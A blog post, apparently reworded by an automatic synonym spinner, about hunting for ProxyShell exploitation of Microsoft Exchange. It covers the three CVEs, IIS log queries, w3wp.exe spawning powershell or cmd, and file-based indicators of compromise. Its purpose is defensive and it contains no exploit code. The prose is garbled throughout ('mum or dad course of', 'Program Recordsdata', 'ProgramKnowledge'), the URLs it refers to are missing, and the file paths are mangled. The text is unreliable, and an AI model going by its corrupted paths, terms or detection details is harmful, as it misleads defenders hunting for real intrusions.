Over the previous a number of months, Microsoft has been having a little bit of a foul run with their fashionable e-mail server platform: Exchange.
Earlier this 12 months, a nation-state group known as HAFNIUM was found to be exploiting Exchange servers with a set of excessive-affect vulnerabilities–an authentication bypass and a distant code execution (RCE). Collectively, these vulnerabilities had been known as “ProxyLogon“. Recently, a brand new set of considerably associated however distinctive vulnerabilities have emerged, known as “ProxyShell”.
ProxyShell consists of three totally different CVEs:
- 2021-34473 Pre-Auth distant code execution
- 2021-34523 Post-Auth code execution utilizing Exchange PowerShell Remoting
- 2021-31207 Post-Auth code execution and file write
In a nutshell, the patches to ProxyLogon earlier in 2021 had been incomplete and result in a wholly totally different set of vulnerabilities. One of the important thing indicators found from ProxyShell exploit makes an attempt is internet requests to the URL:
This URL sample is without doubt one of the key parts of triggering the primary stage of the three exploit chain. If readers are searching for HTTP requests to this URL, make sure that you’re searching for each GET and POST requests. Why? The NMAP NSE script that scans for this vulnerability makes use of GET requests to and examines the HTTP response code to find out if a goal is susceptible. If the goal returns a 302 standing response, it’s susceptible. On the opposite hand, other proof of idea exploits all appear to make use of POST requests.
If readers are accumulating IIS logs (often below ms:iis:auto), my advice is to search for requests to the URLs:
Look for any HTTP response codes to those requests which might be NOT 400-sequence (sc_status). Consider analysing the consumer-agent (cs_user_agent) that despatched the request, supply IP addresses (src), and/or X-Forwarded-For IP (x_forwarded_for) addresses.
As far as different publish-exploitation detection is anxious, the previous standby of “Do you’ve course of creation logs?” (e.g., Group Policy Process Creation Auditing — Event ID 4688, Sysmon Event ID 1, and so on.) and searching for uncommon processes which have w3wp.exe as a mum or dad course of is an efficient place to begin looking for anomalous exercise. Specifically, if w3wp.exe is a mum or dad course of for powershell.exe, cmd.exe, LOLBAS instruments, or an unusually named executable that you just’ve by no means seen earlier than, It’s time to take a better look.
Host-based indicators of compromise might embrace:
- Newly created recordsdata (.aspx) in any of the Microsoft Exchange set up subdirectories (e.g., *inetpubwwwroot*, *Program RecordsdataMicrosoftExchangeServerV15FrontEndHttpProxyowaauth*)
- Newly created recordsdata and folders below the ProgramKnowledge listing
- Any latest modifications to the file *WindowsSystem32inetsrvConfigapplicationHost.config (take into account wanting on the modification timestamps to see if the file was not too long ago modified)
Huntress Labs has executed a wonderful job speaking about the entire particulars concerning the vulnerabilities and indicators associated to ProxyShell. Their write-up of the state of affairs could be discovered here. Orange Tsai’s write-up of the vulnerability chain for Pwn2Own is obtainable here.